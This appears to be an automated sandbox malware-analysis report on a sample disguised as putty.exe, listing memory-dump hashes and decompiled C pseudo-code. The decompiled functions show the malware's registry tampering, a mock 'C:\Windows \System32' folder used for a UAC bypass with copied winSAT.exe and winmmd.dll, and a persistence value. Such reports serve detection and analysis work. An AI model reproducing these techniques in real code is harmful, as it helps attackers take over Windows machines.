                                  • Source File: 0000000B.00000002.2117504430.0000000000232000.00000040.00000001.sdmp, Offset: 00232000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f343e9caac480e4574fec4c8375f1a16bb257b2a7982838d20c0c58b6aea703
                                  • Instruction ID: 553d9166d991dcb4b59e41fbe611fb5241d6c79c97bf217f3ecd3cb7ad236a86
                                  • Opcode Fuzzy Hash: 9f343e9caac480e4574fec4c8375f1a16bb257b2a7982838d20c0c58b6aea703
                                  • Instruction Fuzzy Hash: 2ED05EB9214A928FD7168E1CC1A4B9537D4AB51B04F4644F9A800CB6A3C768E996D200
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053841C, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 15b37a1326e30692f3300362df0a078706531b0598edd45a7d2662b43ccee8d5
                                  • Instruction ID: d05be25a4949a081dcb4586b291b462d5e84fae39be8b7a8557f567c35cb804b
                                  • Opcode Fuzzy Hash: 15b37a1326e30692f3300362df0a078706531b0598edd45a7d2662b43ccee8d5
                                  • Instruction Fuzzy Hash: 54D0A7B14192449A8F208FA0E55459ABBB0EB593547241463C421DD05CC3314541DF52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00535ED0, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6395549b86c121921586b486d4b193468591849d421c3c3ea7f1297c835f8036
                                  • Instruction ID: e21bb40abce101e10d7eb6ed2add933c98cb098ffaaeb43864fe83ff063818a8
                                  • Opcode Fuzzy Hash: 6395549b86c121921586b486d4b193468591849d421c3c3ea7f1297c835f8036
                                  • Instruction Fuzzy Hash: 38D01234402208AFD311EFB5FC4D6697BECEB47212F1441A5D809C3161EB3249C0DBA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 005300CD, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd190c9392041501fde8ff5b571a0b34306c72a0823be25263132d91073c2c32
                                  • Instruction ID: cbecd629332b88f96e133aa6077f7a8fef6bf6ceba3e714fd4108b07abe954a8
                                  • Opcode Fuzzy Hash: cd190c9392041501fde8ff5b571a0b34306c72a0823be25263132d91073c2c32
                                  • Instruction Fuzzy Hash: 77D0C93AE05118CFCB04CFA8E8441DCF771FB8922AB209066C518B3210C7319915CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00538126, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7590dd2b32613d7ff4208ed06f58988c0fbb23730520ec597ca12aae38052d10
                                  • Instruction ID: 31bf71f21b5e88cc1b69fdce2239b3a004056c534f5044e0531caf32c9bb4e43
                                  • Opcode Fuzzy Hash: 7590dd2b32613d7ff4208ed06f58988c0fbb23730520ec597ca12aae38052d10
                                  • Instruction Fuzzy Hash: 11D01275D0564A8F8708CFE3C14009EFFB2AFC9300F55D4678805EB219E23402018B90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00536182, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c6cbf20a192617a0a8248f1471f7e6bc54488770ec2ac6f577823fa6a3a423eb
                                  • Instruction ID: 3c77716545d319f5a96882e7172f59b4b6068c98642da08346ba9c0ab859c091
                                  • Opcode Fuzzy Hash: c6cbf20a192617a0a8248f1471f7e6bc54488770ec2ac6f577823fa6a3a423eb
                                  • Instruction Fuzzy Hash: DBE0927091232ADFEB54DF24EC84F9CFBB2FB45240F54569A9409B7264EB301A85DF10
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 002323BC, Relevance: .0, Instructions: 14COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117504430.0000000000232000.00000040.00000001.sdmp, Offset: 00232000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f22576383bea117ae0c1c9fb948aeb730dd9e55bf6efda70580f3cbebe8c58b
                                  • Instruction ID: 16daf0bcd18155a4c72ab5af9a3f95eab29cba1c2ba965ee2137a206dd23c7cc
                                  • Opcode Fuzzy Hash: 9f22576383bea117ae0c1c9fb948aeb730dd9e55bf6efda70580f3cbebe8c58b
                                  • Instruction Fuzzy Hash: 94D05E743506828BDB15DE0CC294F5973E4AB40B00F0644E9BC008B266C3B8EC94C600
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004003C6, Relevance: .0, Instructions: 13COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117803755.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f820c81d8c487e34e9d96a8a0fc8889697f506f220c29a527d28aa1e18227d7a
                                  • Instruction ID: ef3a0140d9b8b1b4b9438f94957d98f67507c2f88dc69af0e7d48252d2ba4921
                                  • Opcode Fuzzy Hash: f820c81d8c487e34e9d96a8a0fc8889697f506f220c29a527d28aa1e18227d7a
                                  • Instruction Fuzzy Hash: 07E01738901265CFCB20DF60DA44ADDFBB0AB58320F1482DA8419A72D0C7359B8BCF04
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053B9E3, Relevance: .0, Instructions: 12COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c9200b773032f5b560106e8546ff1969afbf3b4f9b6368617b15f364079e2f18
                                  • Instruction ID: 559b0747cc6e1601b2f2ad495b9dd50673df266ca75ad4ebafeb1f7a88586bab
                                  • Opcode Fuzzy Hash: c9200b773032f5b560106e8546ff1969afbf3b4f9b6368617b15f364079e2f18
                                  • Instruction Fuzzy Hash: 40D0127051570EEFD700DB94D44178DB7B5FB85300F5094A9900596168C3349B869B15
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053B369, Relevance: .0, Instructions: 11COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2bde2d4cb8b6baa479e2056b0a602c1e8ba88a7a0bf2d1e2de1f75a8e89db04d
                                  • Instruction ID: 714bb9326f59a701368539d2c0064130ca044fe1ed21513aa8059523913a9317
                                  • Opcode Fuzzy Hash: 2bde2d4cb8b6baa479e2056b0a602c1e8ba88a7a0bf2d1e2de1f75a8e89db04d
                                  • Instruction Fuzzy Hash: 4ED06730A1222AEFDB50DB64D991BCCB7B1FB42200F505A99E405A7154D7305E869F41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00538592, Relevance: .0, Instructions: 10COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecf2dc4182c0f6e7bc8c433dd11e7b87d32a9cf921c1a64219b921ed54308d16
                                  • Instruction ID: 2ffae41c37534ffd4af23fcaf610260509cb7ffc65deb814616f6fdcc27419b1
                                  • Opcode Fuzzy Hash: ecf2dc4182c0f6e7bc8c433dd11e7b87d32a9cf921c1a64219b921ed54308d16
                                  • Instruction Fuzzy Hash: E1C08C7880B38EDF4700DBD8A0465ADBFB0EF49764B209B028417AA2A8DB3424809780
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0053E902, Relevance: .0, Instructions: 9COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 0000000B.00000002.2117994460.0000000000530000.00000040.00000001.sdmp, Offset: 00530000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f3e3e4015c77a1f939a302f6bff134e8e0143c84b5a94718a8df4648c39e9e43
                                  • Instruction ID: 50511ea5d28e202c39ac610e96038b088a67729a40dd79198b4b91332d987978
                                  • Opcode Fuzzy Hash: f3e3e4015c77a1f939a302f6bff134e8e0143c84b5a94718a8df4648c39e9e43
                                  • Instruction Fuzzy Hash: A0D0C9369062898FCB50CFF6D44998DBB71EB05302B109492D00A9F068DB385949CB05
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Analysis Process: putty.exe PID: 2308 Parent PID: 2952 putty.exeCOMMON

                                  Executed Functions

                                  Function 004148B6, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 138comCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 59%
                                  			E004148B6(intOrPtr __ecx) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed short* _v36;
				char _v44;
				signed int* _t43;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr* _t50;
				intOrPtr* _t54;
				signed int _t57;
				char _t60;
				signed int _t61;
				intOrPtr* _t63;
				signed int _t64;
				intOrPtr* _t66;
				intOrPtr* _t67;
				intOrPtr* _t70;
				intOrPtr* _t71;
				void* _t73;
				signed int _t76;
				signed int _t85;
				signed int _t87;
				signed short* _t88;

				_t87 = 0;
				_v28 = __ecx;
				__imp__CoInitialize(0); // executed
				_t43 =  &_v12;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				__imp__CoCreateInstance(0x417600, 0, 1, 0x41a77c, _t43); // executed
				_t66 = _v12;
				if(_t66 != 0) {
					_t43 =  *((intOrPtr*)( *_t66 + 0xc))(_t66, 0x4175f0,  &_v8, 0);
					_t67 = _v8;
					if(_t67 != 0) {
						 *((intOrPtr*)( *_t67 + 0x14))(_t67);
						_t64 = 0;
						while(1) {
							_t47 = _v8;
							_t34 =  &_v24; // 0x414222
							_v20 = _t87;
							_t48 =  *((intOrPtr*)( *_t47 + 0xc))(_t47, 1, _t34,  &_v20);
							if(_t48 != 0) {
								break;
							}
							_t11 =  &_v24; // 0x414222
							_t50 =  *_t11 + _t64 * 4;
							_t48 =  *((intOrPtr*)( *_t50 + 0x24))(_t50, _t87, _t87, 0x417580,  &_v16);
							if(_t48 != 0) {
								break;
							}
							__imp__#8( &_v44);
							_t54 = _v16;
							_push(_t87);
							_push( &_v44);
							_push(L"Description");
							_push(_t54);
							if( *((intOrPtr*)( *_t54 + 0xc))() == 0) {
								L6:
								_t73 = 0x1c;
								if(E00406099(_t73) == 0) {
									_t85 = _t87;
								} else {
									_t85 = E00414B6E(_t56);
								}
								_t88 = _v36;
								_t57 =  *_t88 & 0x0000ffff;
								if(_t57 == 0) {
									L12:
									 *(_t85 + 8) = _t64;
									E00402503(_v28 + 4, _t85);
									_t64 = _t64 + 1;
									_t87 = 0;
									continue;
								} else {
									_t76 = _t57;
									do {
										 *( *((intOrPtr*)(_t85 + 4)) + _t87 * 2) = _t76;
										_t60 =  *_t88;
										_t88 =  &(_t88[1]);
										 *((char*)(_t87 +  *_t85)) = _t60;
										_t87 = _t87 + 1;
										_t61 =  *_t88 & 0x0000ffff;
										_t76 = _t61;
									} while (_t61 != 0);
									goto L12;
								}
							}
							_t63 = _v16;
							_t48 =  *((intOrPtr*)( *_t63 + 0xc))(_t63, L"FriendlyName",  &_v44, _t87);
							if(_t48 != 0) {
								break;
							}
							goto L6;
						}
						_t70 = _v8;
						if(_t70 != 0) {
							_t48 =  *((intOrPtr*)( *_t70 + 8))(_t70);
							_v8 = _t87;
						}
						_t71 = _v12;
						if(_t71 != 0) {
							_t48 =  *((intOrPtr*)( *_t71 + 8))(_t71);
							_v12 = _t87;
						}
						__imp__CoUninitialize();
						return _t48;
					}
				}
				return _t43;
			}






























                                  0x004148bf
                                  0x004148c1
                                  0x004148c5
                                  0x004148cb
                                  0x004148ce
                                  0x004148df
                                  0x004148e2
                                  0x004148e5
                                  0x004148eb
                                  0x004148f0
                                  0x00414903
                                  0x00414906
                                  0x0041490b
                                  0x00414914
                                  0x00414917
                                  0x004149c9
                                  0x004149c9
                                  0x004149d0
                                  0x004149d3
                                  0x004149dc
                                  0x004149e1
                                  0x00000000
                                  0x00000000
                                  0x0041491e
                                  0x0041492b
                                  0x00414932
                                  0x00414937
                                  0x00000000
                                  0x00000000
                                  0x00414941
                                  0x00414947
                                  0x0041494d
                                  0x0041494e
                                  0x0041494f
                                  0x00414956
                                  0x0041495c
                                  0x00414975
                                  0x00414977
                                  0x0041497f
                                  0x0041498c
                                  0x00414981
                                  0x00414988
                                  0x00414988
                                  0x0041498e
                                  0x00414991
                                  0x00414997
                                  0x004149b7
                                  0x004149bb
                                  0x004149c1
                                  0x004149c6
                                  0x004149c7
                                  0x00000000
                                  0x00414999
                                  0x00414999
                                  0x0041499b
                                  0x0041499e
                                  0x004149a4
                                  0x004149a6
                                  0x004149a9
                                  0x004149ac
                                  0x004149ad
                                  0x004149b0
                                  0x004149b2
                                  0x00000000
                                  0x0041499b
                                  0x00414997
                                  0x0041495e
                                  0x0041496e
                                  0x00414973
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00414973
                                  0x004149e7
                                  0x004149ec
                                  0x004149f1
                                  0x004149f4
                                  0x004149f4
                                  0x004149f7
                                  0x004149fc
                                  0x00414a01
                                  0x00414a04
                                  0x00414a04
                                  0x00414a07
                                  0x00000000
                                  0x00414a07
                                  0x0041490b
                                  0x00414a11

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 004148C5
                                  • CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 004148E5
                                  • VariantInit.OLEAUT32(?), ref: 00414941
                                  • CoUninitialize.OLE32 ref: 00414A07
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInitInitializeInstanceUninitializeVariant
                                  • String ID: "BA$Description$FriendlyName
                                  • API String ID: 4142528535-3217936966
                                  • Opcode ID: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                  • Instruction ID: 897dfebaec31b784598ba9d9a56bb6e289364e2dbf67f6d0e24be1ac2d118ec5
                                  • Opcode Fuzzy Hash: 761bde241649a148fa67ece00141f1678206c90973f6c88279f2455c6c97f1a1
                                  • Instruction Fuzzy Hash: 62413E74A00245AFCB14DFA5C888DEFBBB9EFC4714B14459EE441EB250DB78DA41CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00406045, Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00406045(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
				return _t2;
			}




                                  0x0040604f
                                  0x00406055

                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?,004030E2,00405B80,?,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 00406048
                                  • RtlAllocateHeap.NTDLL(00000000,?,0041191C,00405B80,?,?,74A313FB,00000000,?,00405B80,00000000), ref: 0040604F
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID:
                                  • API String ID: 1357844191-0
                                  • Opcode ID: 23e14b04ba23bb0a7572a9d137d38e85150c57062142801fbe0a0820d84e1829
                                  • Instruction ID: 8cf45ecabbe94aee1392de7f34d48094c70ab4a430d8d374c6facdf70f7c2239
                                  • Opcode Fuzzy Hash: 23e14b04ba23bb0a7572a9d137d38e85150c57062142801fbe0a0820d84e1829
                                  • Instruction Fuzzy Hash: C0A002715541005BDE5467A49F0DF553639B748701F0485947145C5060DBB454458776
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004154EB, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 191registrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E004154EB(void* __eflags) {
				char _v592;
				char _v608;
				char _v1120;
				short _v1140;
				char _v1372;
				intOrPtr _v1492;
				char _v1496;
				char _v1508;
				char _v1512;
				char _v1528;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1560;
				intOrPtr _v1568;
				intOrPtr _v1584;
				intOrPtr _v1592;
				char _v1596;
				char _v1600;
				intOrPtr _v1604;
				int _v1608;
				char _v1616;
				char _v1620;
				char _v1624;
				void* _v1628;
				char _v1632;
				char _v1636;
				char _v1648;
				void* __edi;
				void* _t57;
				void* _t100;
				void* _t103;
				CHAR* _t116;
				char* _t123;
				CHAR* _t129;
				void* _t133;

				_v1616 = 0xa;
				_v1608 = 0;
				E00405D37( &_v1596);
				E00412C11( &_v1508);
				E004010AD(GetTickCount());
				_v1648 = 0x104;
				GetModuleFileNameA(0,  &_v1372, _t129);
				_v1624 = 0;
				_t57 = E004134A2( &_v1372,  &_v1624); // executed
				_t128 = _v1624;
				if(_v1624 == 0) {
					L22:
					E0041267D( &_v1508);
					E00405D5C( &_v1596, _t129);
					return 0;
				} else {
					_v1620 = 0;
					E00413279(_t57, _t128, 0x215a,  &_v1620);
					_t133 = 0x20;
					_t129 = E00401085(_t133);
					_t116 = _t129;
					do {
						 *_t116 = 0;
						_t116 =  &(_t116[1]);
						_t133 = _t133 - 1;
					} while (_t133 != 0);
					E0040102C(_t129,  &_v1620, 4);
					 *0x559cb0 = CreateEventA(0, 0, 0, _t129);
					if(GetLastError() == 0xb7) {
						goto L22;
					}
					_t145 =  *0x559cb0;
					if( *0x559cb0 == 0) {
						goto L22;
					}
					RegCreateKeyExA(0x80000001, "Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", 0, 0, 0, 0xf003f, 0,  &_v1628,  &_v1608); // executed
					RegSetValueExA(_v1628, "MaxConnectionsPer1_0Server", 0, 4,  &_v1616, 4); // executed
					RegSetValueExA(_v1628, "MaxConnectionsPerServer", 0, 4,  &_v1616, 4); // executed
					RegCloseKey(_v1628);
					E00405B4E( &_v1596, _t128, _t145); // executed
					E00412A7F( &_v1508, _t128, _t145,  &_v1596); // executed
					_t119 =  &_v592;
					E00405000( &_v592, _t128, _t145,  &_v1600,  &_v1512); // executed
					E00401052( &_v1120, 0, 0x208);
					__imp__SHGetFolderPathW(0, 0x1c, 0, 0,  &_v1120); // executed
					lstrcatW( &_v1140, L"\\Microsoft Vision\\");
					CreateDirectoryW( &_v1140, 0); // executed
					if(_v1568 != 0 && E0041111B() != 1) {
						_t103 = E00410A3C();
						_t148 = _t103 - 0xa;
						if(_t103 != 0xa) {
							E00412F55(__eflags);
						} else {
							E0041313A(_t128, _t148);
						}
					}
					if(_v1552 != 0) {
						_t100 = E0041111B();
						_t150 = _t100 - 1;
						if(_t100 == 1) {
							E00414F7E(_t119, _t150);
						}
					}
					if(_v1548 != 0) {
						E0040F073();
					}
					_t152 = _v1492;
					if(_v1492 != 0) {
						L18:
						__eflags = _v1560;
						if(__eflags != 0) {
							E00413EBA();
						}
						E00404F74( &_v608, _t128, __eflags);
						goto L21;
					} else {
						E004126DC( &_v1528, _t152, _v1592, _v1584, _v1544); // executed
						_t153 = _v1604;
						if(_v1604 == 0) {
							goto L18;
						}
						_v1624 = 0;
						_t123 =  &_v1632;
						E0040373F(_t123,  &_v1496); // executed
						_push(_t123);
						E004120F8( &_v1624, _t153,  &_v1636,  &_v1628); // executed
						E00405FEB(_v1648);
						E00405FEB(0);
						L21:
						E00404C8D( &_v608, _t129, _t153);
						goto L22;
					}
				}
			}







































                                  0x004154fb
                                  0x00415508
                                  0x0041550c
                                  0x00415518
                                  0x00415524
                                  0x00415529
                                  0x00415539
                                  0x00415543
                                  0x0041554e
                                  0x00415553
                                  0x00415559
                                  0x0041576e
                                  0x00415775
                                  0x0041577e
                                  0x0041578b
                                  0x0041555f
                                  0x00415563
                                  0x0041556f
                                  0x00415576
                                  0x0041557d
                                  0x00415582
                                  0x00415584
                                  0x00415584
                                  0x00415586
                                  0x00415587
                                  0x00415587
                                  0x00415594
                                  0x004155a6
                                  0x004155b6
                                  0x00000000
                                  0x00000000
                                  0x004155bc
                                  0x004155c2
                                  0x00000000
                                  0x00000000
                                  0x004155e5
                                  0x00415604
                                  0x00415619
                                  0x0041561f
                                  0x00415629
                                  0x0041563a
                                  0x0041564c
                                  0x00415653
                                  0x00415666
                                  0x0041567b
                                  0x0041568e
                                  0x0041569d
                                  0x004156a7
                                  0x004156b3
                                  0x004156b8
                                  0x004156bb
                                  0x004156c4
                                  0x004156bd
                                  0x004156bd
                                  0x004156bd
                                  0x004156bb
                                  0x004156cd
                                  0x004156cf
                                  0x004156d4
                                  0x004156d7
                                  0x004156d9
                                  0x004156d9
                                  0x004156d7
                                  0x004156e2
                                  0x004156e4
                                  0x004156e4
                                  0x004156e9
                                  0x004156f0
                                  0x0041574b
                                  0x0041574b
                                  0x0041574f
                                  0x00415751
                                  0x00415751
                                  0x0041575d
                                  0x00000000
                                  0x004156f2
                                  0x00415705
                                  0x0041570a
                                  0x0041570e
                                  0x00000000
                                  0x00000000
                                  0x00415717
                                  0x0041571c
                                  0x00415720
                                  0x00415725
                                  0x00415734
                                  0x0041573d
                                  0x00415744
                                  0x00415762
                                  0x00415769
                                  0x00000000
                                  0x00415769
                                  0x004156f0

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0041551D
                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415539
                                    • Part of subcall function 004134A2: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 004134CF
                                    • Part of subcall function 004134A2: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,00415553), ref: 004134E2
                                    • Part of subcall function 004134A2: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004134F3
                                    • Part of subcall function 004134A2: CloseHandle.KERNEL32(00000000), ref: 00413500
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004155A0
                                  • GetLastError.KERNEL32 ref: 004155AB
                                  • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 004155E5
                                  • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 00415604
                                  • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00415619
                                  • RegCloseKey.ADVAPI32(?), ref: 0041561F
                                  • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041567B
                                  • lstrcatW.KERNEL32 ref: 0041568E
                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 0041569D
                                    • Part of subcall function 00412F55: CloseHandle.KERNEL32(?), ref: 00412F7F
                                    • Part of subcall function 00412F55: Wow64DisableWow64FsRedirection.KERNEL32(?,00000000,00000000,?,?,?,00405909,?,00000000,00000000,?,?,?,?,?,?), ref: 00412F99
                                    • Part of subcall function 00412F55: GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,?,?,?,?,?,00405909,?,00000000,00000000), ref: 00412FBE
                                    • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00412FE3
                                    • Part of subcall function 00412F55: lstrcatW.KERNEL32 ref: 00412FF7
                                    • Part of subcall function 00412F55: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0041301B
                                    • Part of subcall function 00412F55: lstrcatW.KERNEL32 ref: 00413029
                                    • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \,00000000), ref: 00413039
                                    • Part of subcall function 00412F55: CreateDirectoryW.KERNEL32(\\?\C:\Windows \System32,00000000), ref: 00413041
                                    • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winSAT.exe,00000000), ref: 00413056
                                    • Part of subcall function 00412F55: CopyFileW.KERNEL32(?,\\?\C:\Windows \System32\winmmd.dll,00000000), ref: 00413065
                                    • Part of subcall function 00412F55: RegSetValueExW.ADVAPI32(00000000,Virtual Machine Platform,00000000,00000001,?,00001000), ref: 00413083
                                    • Part of subcall function 00412F55: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 0041308A
                                    • Part of subcall function 00412F55: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00405909), ref: 00413094
                                    • Part of subcall function 004126DC: CopyFileW.KERNEL32(?,?,00000000), ref: 0041277D
                                    • Part of subcall function 0040373F: lstrcpyW.KERNEL32(00000000,74A313FB), ref: 00403769
                                    • Part of subcall function 004120F8: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00412133
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                  Strings
                                  • MaxConnectionsPer1_0Server, xrefs: 004155FB
                                  • \Microsoft Vision\, xrefs: 00415681
                                  • MaxConnectionsPerServer, xrefs: 00415610
                                  • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 004155DB
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: File$Create$Directory$Close$CopyProcessValuelstrcat$HandleHeapModuleNameSystemWow64$AllocateCountCurrentDisableErrorEventFolderFreeLastPathReadRedirectionSizeTickVirtuallstrcpy
                                  • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                  • API String ID: 651455083-2552559493
                                  • Opcode ID: 4a5fae1ebe26e36fe060b07020dc0cbf3753f0c38d14f470fd35631cd4a0eb1f
                                  • Instruction ID: 7326d773f6840a3835b81c51b4f2bde8360c666f101d5547bb5d37e447b5e8b5
                                  • Opcode Fuzzy Hash: 4a5fae1ebe26e36fe060b07020dc0cbf3753f0c38d14f470fd35631cd4a0eb1f
                                  • Instruction Fuzzy Hash: 81614171408344EBD720EF61CC85EEF77B8EF94708F40492FB685921A1DB389985CB6A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004126DC, Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 296fileprocessCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 96%
                                  			E004126DC(intOrPtr* __ecx, void* __eflags, WCHAR* _a4, char* _a8, void* _a12) {
				void* _v12;
				WCHAR* _v16;
				WCHAR* _v20;
				intOrPtr* _v24;
				WCHAR* _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				void* _t90;
				void* _t94;
				intOrPtr* _t108;
				intOrPtr* _t112;
				intOrPtr* _t130;
				intOrPtr* _t132;
				intOrPtr* _t145;
				intOrPtr* _t147;
				int _t152;
				void* _t161;
				void* _t167;
				int _t170;
				int _t179;
				char* _t185;
				WCHAR* _t192;
				intOrPtr _t228;
				intOrPtr* _t254;
				CHAR* _t255;
				void* _t261;
				WCHAR* _t263;
				WCHAR** _t264;
				char** _t265;
				void* _t268;

				_t268 = __eflags;
				_t254 = __ecx;
				_v24 = __ecx;
				E004109A0(); // executed
				_t250 = 0xa;
				_t185 =  &_v44;
				E004035B9(_t185, _t250, _t268); // executed
				_push(_t185);
				_push(_t185);
				_t90 = E00412514(__ecx, _t185, __ecx + 0x10); // executed
				E00412554(__ecx);
				_t179 = 0;
				if(_t90 == 0) {
					L4:
					_t259 = _t254 + 0x10;
					goto L5;
				} else {
					_t270 = _a4;
					if(_a4 == 0) {
						goto L4;
					} else {
						_t250 =  *((intOrPtr*)(__ecx + 0xc));
						_t264 = __ecx + 0x20;
						_t161 = E00410C8A( &_v28,  *((intOrPtr*)(__ecx + 0xc)), _t270); // executed
						E00403549(_t264, _t161); // executed
